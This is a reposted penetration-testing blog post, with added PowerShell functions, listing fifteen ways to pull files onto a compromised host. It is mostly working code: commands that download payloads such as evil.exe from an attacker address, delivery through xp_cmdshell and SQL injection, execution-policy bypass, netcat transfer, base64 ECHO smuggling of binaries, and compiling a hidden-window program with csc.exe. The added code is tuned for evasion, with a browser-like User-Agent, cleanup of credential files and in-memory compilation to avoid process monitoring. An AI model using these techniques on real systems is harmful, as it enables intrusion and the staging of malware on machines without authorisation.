Pentest - 15 ways to Download a File

Source: Internet   Posted under: 外墙线条展开面积算法   Editor: 程序博客网   Time: 2024/05/17 22:53

Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system. It should be interesting for penetration testers who have a presence on a box and need post-exploitation options, and system admins that just want to move files.

There are many other ways to move files onto machines during pentests, but this list includes some of my favorites. Below is a summary of the file transfer techniques that will be covered in this blog.

  • Powershell file download
  • Visual Basic file download
  • Perl file download
  • Python file download
  • Ruby file download
  • PHP file download
  • FTP file download
  • TFTP file download
  • Bitsadmin file download
  • Wget file download
  • Netcat file download
  • Windows share file download
  • Notepad dialog box file download
  • Exe to Text, Text to EXE with PowerShell and Nishang
  • Csc.exe to compile from source file.

Note: Many of the techniques listed should also be considered as options when executing commands through SQL injection (for example via xp_cmdshell), where you typically get one command at a time and no interactive session. For the multi-line steps, ECHO each line of the script into a file, and then execute the file.

PowerShell File Download

PowerShell is one of those scripting languages that can be overlooked as a threat by administrators. However, it can provide a plethora of options and capabilities to someone who knows how to use it. The biggest benefit is that it is native to Windows: it has shipped with every Windows release since Windows 7 and Server 2008 R2, and was available as a separate download for Windows XP and Server 2003. Below is an example of a simple script that downloads a file from a web server to the local file system. Note that PowerShell does not expand cmd.exe-style %homepath% variables; use $env:HOMEDRIVE and $env:HOMEPATH instead:

$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file", "$env:HOMEDRIVE$env:HOMEPATH\file")

To execute this script, save it as test.ps1 and run the following command in a PowerShell window:

PS C:\> .\test.ps1

Or, we can echo it to a file one line at a time from a cmd.exe prompt (the form that works through a command-injection channel) and then run it:

echo $webclient = New-Object System.Net.WebClient > wget.ps1
echo $url = "http://192.168.10.5/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url, $file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Sometimes the PowerShell execution policy is set to Restricted, which blocks running script files (individual commands typed at the prompt or passed with -Command still run). The execution policy is a safety feature rather than a security boundary: the -ExecutionPolicy Bypass switch used above sidesteps it for a single invocation without changing any setting, or you can change it outright with the following command:

C:\> powershell Set-ExecutionPolicy Unrestricted

Changing the machine-wide policy requires an elevated prompt and is more likely to be noticed; add -Scope CurrentUser to change it only for the current user.
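The WebClient one-liner above is enough on a lab box, but on a real engagement the download usually has to go through the organisation's authenticated egress proxy, and you want to know the file arrived intact before you run it. The function below is an added example, not code from the original post: it reuses the system proxy with the logged-on user's credentials, forces TLS 1.2 (needed on older hosts that still default to SSL 3/TLS 1.0), and refuses to keep the file if an expected SHA-256 is given and does not match. The URL and hash in the usage line are placeholders.

```powershell
# Added example (not from the original post): WebClient download through the
# system proxy, with an optional SHA-256 check on the result.
function Get-RemoteFile {
    param(
        [Parameter(Mandatory = $true)][string]$Url,
        [Parameter(Mandatory = $true)][string]$OutFile,
        [string]$ExpectedSha256          # optional: abort if the hash does not match
    )

    # Older Windows builds default to SSL 3/TLS 1.0; most servers now require TLS 1.2.
    # The enum value only exists on .NET 4.5+, so tolerate failure on very old hosts.
    try {
        [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
    } catch { Write-Warning 'TLS 1.2 not available on this host; continuing with defaults' }

    $wc = New-Object System.Net.WebClient
    # Take the proxy from the user's Internet settings and hand it the current
    # user's credentials, so an authenticated egress proxy does not block us.
    $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
    $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
    # A browser-like User-Agent blends in with normal traffic in the proxy logs.
    $wc.Headers.Add('User-Agent', 'Mozilla/5.0')

    $wc.DownloadFile($Url, $OutFile)

    if ($ExpectedSha256) {
        $sha    = [System.Security.Cryptography.SHA256]::Create()
        $bytes  = [System.IO.File]::ReadAllBytes($OutFile)
        $actual = ($sha.ComputeHash($bytes) | ForEach-Object { $_.ToString('x2') }) -join ''
        if ($actual -ne $ExpectedSha256.ToLower()) {
            Remove-Item -Path $OutFile -Force
            throw "Hash mismatch for $OutFile (got $actual)"
        }
    }
    Get-Item -Path $OutFile
}

# Usage (hypothetical host and hash):
# Get-RemoteFile -Url 'http://192.168.10.5/tool.exe' -OutFile "$env:TEMP\tool.exe" `
#                -ExpectedSha256 '0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef'
```

When all you have is a cmd.exe prompt (or xp_cmdshell), the same WebClient call fits in a single command without any script file: powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object Net.WebClient).DownloadFile('http://192.168.10.5/evil.exe','C:\Windows\Temp\evil.exe')". Writing to C:\Windows\Temp avoids guessing the profile path of whatever account the command runs under.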

Visual Basic File Download

VBScript, run by the Windows Script Host, has shipped with Windows since Windows 98, so the following script works on practically any Windows target (note, however, that Microsoft has deprecated VBScript and is making it an optional component in current Windows 11 releases, so check that it is still present). The script downloads a file of your choosing; it is considerably longer than the PowerShell one.

echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > download.vbs

The ^" sequences above escape the double quotes for cmd.exe so that they are written into the file literally; the colons separate VBScript statements so the whole script fits on one ECHO line.

Cscript is the console-based Windows Script Host, which lets you pass command line arguments to the script and see its output in the shell you already have. Its GUI counterpart, wscript.exe, runs the same script (and is what Windows uses when a .vbs file is double-clicked), but it pops up message boxes instead of printing to the console. Both hosts are present on Windows XP and later.

To execute this script, run the following command in a command shell:

C:\> cscript download.vbs http://demo/evil.exe evil.exe

Perl File Download

#!/usr/bin/perl
use LWP::Simple;
# getstore fetches the URL and writes the body to the named local file
getstore("http://domain/file", "file");

Python File Download

#!/usr/bin/python
# Python 2 (urllib2); on Python 3 use "from urllib.request import urlopen" instead.
import urllib2
u = urllib2.urlopen('http://domain/file')
# open in binary mode so an executable is written byte-for-byte
localFile = open('local_file', 'wb')
localFile.write(u.read())
localFile.close()

Ruby File Download

#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  # binary mode so the response body is written unchanged
  File.open("save_location", "wb") { |file| file.write(r.body) }
}

PHP File Download

<?php
// file() returns an array of lines, so writing only $data[0] would save just the
// first line; file_get_contents() returns the whole body as one string.
// Requires allow_url_fopen to be enabled in php.ini.
$data = @file_get_contents("http://example.com/file");
$lf = "local_file";
$fh = fopen($lf, 'wb');
fwrite($fh, $data);
fclose($fh);
?>

FTP File Download

The following are typed at the ftp prompt one at a time. The binary command must come before get, because the Windows ftp.exe client transfers in ASCII mode by default and will corrupt an executable. Note also that ftp.exe only supports active-mode data connections, so the server must be able to connect back to the target host.

ftp 127.0.0.1
username
password
binary
get file
exit
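The interactive session above does not work from a single injected command or a scheduled task, but ftp.exe can read its commands from a file via the -s: switch, which is the usual way to script it. The following function is an added example rather than code from the original post: it writes the command file, runs the transfer, cleans up, and reports whether the file arrived. Server, credentials and file names are placeholders.

```powershell
# Added example (not from the original post): non-interactive ftp.exe download
# driven by a command file passed with -s:. Host and credentials are assumed.
function Get-FileViaFtp {
    param(
        [string]$Server     = '192.168.10.5',            # assumed attacker FTP server
        [string]$User       = 'anonymous',
        [string]$Password   = 'anon@example.com',
        [string]$RemoteFile = 'evil.exe',
        [string]$LocalFile  = "$env:TEMP\evil.exe"
    )
    $script = "$env:TEMP\ftp.txt"
    # ftp.exe reads these lines exactly as if they were typed at its prompt:
    # the two lines after "open" answer the user and password prompts.
    @(
        "open $Server",
        $User,
        $Password,
        'binary',                        # ASCII is the default and corrupts executables
        "get $RemoteFile $LocalFile",
        'quit'
    ) | Set-Content -Path $script -Encoding ASCII

    $log = ftp "-s:$script"              # -s: reads the commands from the file
    Remove-Item -Path $script -Force     # do not leave credentials on disk
    if (-not (Test-Path -Path $LocalFile)) {
        throw "Transfer failed:`n$($log -join "`n")"
    }
    Get-Item -Path $LocalFile
}

# Usage (hypothetical server): Get-FileViaFtp -Server 192.168.10.5 -RemoteFile tool.exe
```

Through an egress firewall that allows outbound port 21 but not the inbound data connection active mode needs, this will authenticate and then hang on the get; in that case fall back to HTTP-based methods.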

TFTP File Download

The Windows client's syntax is tftp [-i] host [GET | PUT] source [destination], so for a GET the remote file name comes first and the local path second. -i selects binary (octet) mode, which is required for executables. The tftp client is not installed by default on Windows Vista and later; it must be enabled as an optional Windows feature.

tftp -i host GET file_on_tftp_server C:\%homepath%\file

Bitsadmin File Download

bitsadmin /transfer n http://domain/file C:\%homepath%\file

The destination must be a full path, and "n" is simply the job name. The transfer is performed by the BITS service rather than your own process, so it shows up differently in process and network monitoring. bitsadmin is deprecated but still shipped; the PowerShell equivalent (Windows 7 and later, via the BitsTransfer module) is Start-BitsTransfer -Source http://domain/file -Destination C:\path\file.

Wget File Download

wget http://example.com/file

This is the Unix wget. On Windows, wget is not installed by default, but PowerShell 3 and later defines wget as an alias for Invoke-WebRequest, whose syntax differs: wget http://example.com/file -OutFile file.

Netcat File Download

On your machine, serve the file with a listening netcat (traditional netcat needs -p before the port, i.e. nc -l -p 1234; the OpenBSD variant uses the form shown):

cat file | nc -l 1234

On the target, connect and redirect the stream to a file:

nc host_ip 1234 > file

Netcat is rarely present on a Windows target, so this usually means uploading nc.exe with one of the other methods first.

Windows Share File Download

net use x: \\127.0.0.1\share /user:example.com\userID myPassword

Once the drive is mapped the file can be copied like any local file; you can also reference the UNC path \\127.0.0.1\share\file directly without mapping a drive. Outbound SMB (TCP 445) is commonly blocked at the perimeter, so this mostly works against shares inside the target network.

Notepad Dialog Box File Download

  1. Open notepad
  2. Go to file - open
  3. In the File Name box near the bottom, type in the full URL path to your file; the dialog fetches it and opens it in Notepad
  4. Go to file - save as and write it to the location you want

This requires an interactive desktop (for example over RDP). Because Notepad treats the contents as text, use it for scripts and text payloads rather than raw executables.

Exe to Txt, and Txt to Exe with PowerShell and Nishang

Nishang's ExetoText.ps1 encodes an executable into a plain text file, and TexttoExe.ps1 turns that text back into the original executable. This lets you move a binary over channels that only carry text (copy and paste, a web form, ECHO commands through SQL injection).

PS > .\ExetoText.ps1 evil.exe evil.txt
PS > .\TexttoExe.ps1 evil.txt evil.exe
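The mechanism behind those two scripts is simple enough to reproduce without Nishang, and doing so shows why it fits the "ECHO the commands to a file" note at the top of the post. The helpers below are an added example, not Nishang's code: they base64-encode a file into short lines, generate one cmd.exe ECHO command per line to rebuild the text on the target, and decode the text back into the original bytes. File names are placeholders and the sample file is constructed in the block.

```powershell
# Added example (not Nishang's code): binary -> base64 text -> ECHO commands ->
# binary. The idea generalises beyond .exe files to anything you need to move
# as text.

function ConvertTo-TextPayload {
    param(
        [Parameter(Mandatory = $true)][string]$Path,      # binary to encode
        [Parameter(Mandatory = $true)][string]$OutFile,   # base64 text file to write
        [int]$LineLength = 76                              # short lines paste/echo safely
    )
    $b64   = [Convert]::ToBase64String([System.IO.File]::ReadAllBytes($Path))
    $lines = @()
    for ($i = 0; $i -lt $b64.Length; $i += $LineLength) {
        $lines += $b64.Substring($i, [Math]::Min($LineLength, $b64.Length - $i))
    }
    Set-Content -Path $OutFile -Value $lines -Encoding ASCII
    return $lines.Count
}

function New-EchoCommands {
    # One ECHO per line, the form that works through xp_cmdshell or any other
    # single-command channel. The space before ">" is deliberate: a line ending
    # in a digit followed directly by ">" would be parsed by cmd.exe as a handle
    # redirection such as "1>". FromBase64String ignores the extra whitespace.
    param(
        [Parameter(Mandatory = $true)][string]$TextFile,
        [string]$RemotePath = 'C:\Windows\Temp\payload.txt'   # assumed target path
    )
    $first = $true
    foreach ($line in Get-Content -Path $TextFile) {
        $redirect = if ($first) { '>' } else { '>>' }
        "echo $line $redirect$RemotePath"
        $first = $false
    }
}

function ConvertFrom-TextPayload {
    param(
        [Parameter(Mandatory = $true)][string]$TextFile,
        [Parameter(Mandatory = $true)][string]$OutFile
    )
    # ReadAllText keeps the newlines; FromBase64String skips whitespace, so no
    # joining or trimming is required before decoding.
    $bytes = [Convert]::FromBase64String([System.IO.File]::ReadAllText($TextFile))
    [System.IO.File]::WriteAllBytes($OutFile, $bytes)
    return $bytes.Length
}

# Round trip on a constructed 4 KB file of pseudo-random bytes (stands in for evil.exe)
$src = "$env:TEMP\sample.bin"; $txt = "$env:TEMP\sample.txt"; $dst = "$env:TEMP\sample.out"
$rng = New-Object System.Random 42
$buf = New-Object byte[] 4096
$rng.NextBytes($buf)
[System.IO.File]::WriteAllBytes($src, $buf)

ConvertTo-TextPayload -Path $src -OutFile $txt | Out-Null
New-EchoCommands -TextFile $txt | Select-Object -First 2       # what you would inject
ConvertFrom-TextPayload -TextFile $txt -OutFile $dst | Out-Null
$same = (([System.IO.File]::ReadAllBytes($dst) -join ',') -eq ($buf -join ','))
"Round trip intact: $same"
```

On the target, after the ECHO commands have rebuilt payload.txt, the decode step is a single PowerShell command using the same two .NET calls, so no script file needs to exist there. A 100 KB executable becomes roughly 1,800 ECHO commands at 76 characters per line; raise LineLength where the injection channel allows longer strings.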

Csc.exe to Compile Source from a File

The C# compiler (csc.exe) is the command line compiler included with every .NET Framework installation on Windows. This could be useful if you are unable to copy over an executable file, but can still copy over text. Combined with SQL injection, this method can get an exe onto a box without having to bypass egress filters or authenticated proxies that might block outbound connectivity.

The default location for this executable is the following (Framework64 for the 64-bit compiler); on any host with .NET 4.x the version directory is v4.0.30319:

C:\Windows\Microsoft.NET\Framework\version\csc.exe

Using the following example code, the compiled executable will use cmd.exe to query the local users on the box and write the results to a file in the C:\Temp directory (which must already exist). This could obviously be modified to interact with different exe's on the box, or completely re-written to use your own exploit code.

public class Evil
{
    public static void Main()
    {
        System.Diagnostics.Process process = new System.Diagnostics.Process();
        System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
        // run cmd.exe without showing a window
        startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
        startInfo.FileName = "cmd.exe";
        // /C runs the command and exits; output is redirected to a file
        startInfo.Arguments = @"/C net user > C:\Temp\users.txt";
        process.StartInfo = startInfo;
        process.Start();
        process.WaitForExit();
    }
}

To compile your source code and run the result, type (adjusting the version directory to what is installed):

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs
C:\evil\evil.exe
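The version directory differs between hosts (v2.0.50727 on .NET 2/3.x-only machines, v4.0.30319 on anything with .NET 4.x, Framework64 for 64-bit builds), so a reusable procedure should discover csc.exe rather than hard-code it. The functions below are an added example, not part of the original post: they find the newest compiler on the box, compile a source file with it, and show the Add-Type alternative for the case where you only need to load and call the code, not leave an .exe on disk. The source and output paths in the usage lines are placeholders.

```powershell
# Added example (not from the original post): locate csc.exe, compile a C# file
# with it, or compile the same source in-memory with Add-Type.

function Find-Csc {
    # Framework holds the 32-bit compilers, Framework64 the 64-bit ones; pick the
    # highest version present so the source can use modern C# syntax.
    Get-ChildItem -Path "$env:windir\Microsoft.NET\Framework*\v*\csc.exe" -ErrorAction SilentlyContinue |
        Sort-Object -Property { [version]($_.Directory.Name.TrimStart('v')) } -Descending |
        Select-Object -First 1 -ExpandProperty FullName
}

function Build-CSharpExe {
    param(
        [Parameter(Mandatory = $true)][string]$Source,    # path to the .cs file
        [Parameter(Mandatory = $true)][string]$OutFile,   # path of the .exe to create
        [switch]$NoConsole                                # build a windowed exe (no console flash)
    )
    $csc = Find-Csc
    if (-not $csc) { throw 'No csc.exe found under %windir%\Microsoft.NET' }
    $target = if ($NoConsole) { 'winexe' } else { 'exe' }
    & $csc /nologo "/target:$target" "/out:$OutFile" $Source
    if ($LASTEXITCODE -ne 0) { throw "csc.exe failed with exit code $LASTEXITCODE" }
    Get-Item -Path $OutFile
}

function Invoke-CSharpInMemory {
    # Add-Type compiles the source into the current process (Windows PowerShell
    # still runs csc.exe under the hood and writes temp files, so this is not
    # invisible, but it leaves no payload .exe behind). Returns the type so the
    # caller can invoke its static methods.
    param([Parameter(Mandatory = $true)][string]$Source)
    Add-Type -TypeDefinition ([System.IO.File]::ReadAllText($Source))
    [Evil]     # the class name used in the source above
}

# Usage (hypothetical paths):
# Build-CSharpExe -Source 'C:\evil\evil.cs' -OutFile 'C:\evil\evil.exe' -NoConsole
# (Invoke-CSharpInMemory -Source 'C:\evil\evil.cs')::Main()
```

Because Add-Type compiles into the running PowerShell process, the Main method executes under the PowerShell host rather than as a new evil.exe process, which changes what process-creation monitoring records.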

References

  1. https://blog.netspi.com/15-ways-to-download-a-file/
  2. http://blog.csdn.net/nixawk/article/details/45131059
  3. http://superuser.com/questions/59465/is-it-possible-to-download-using-the-windows-command-line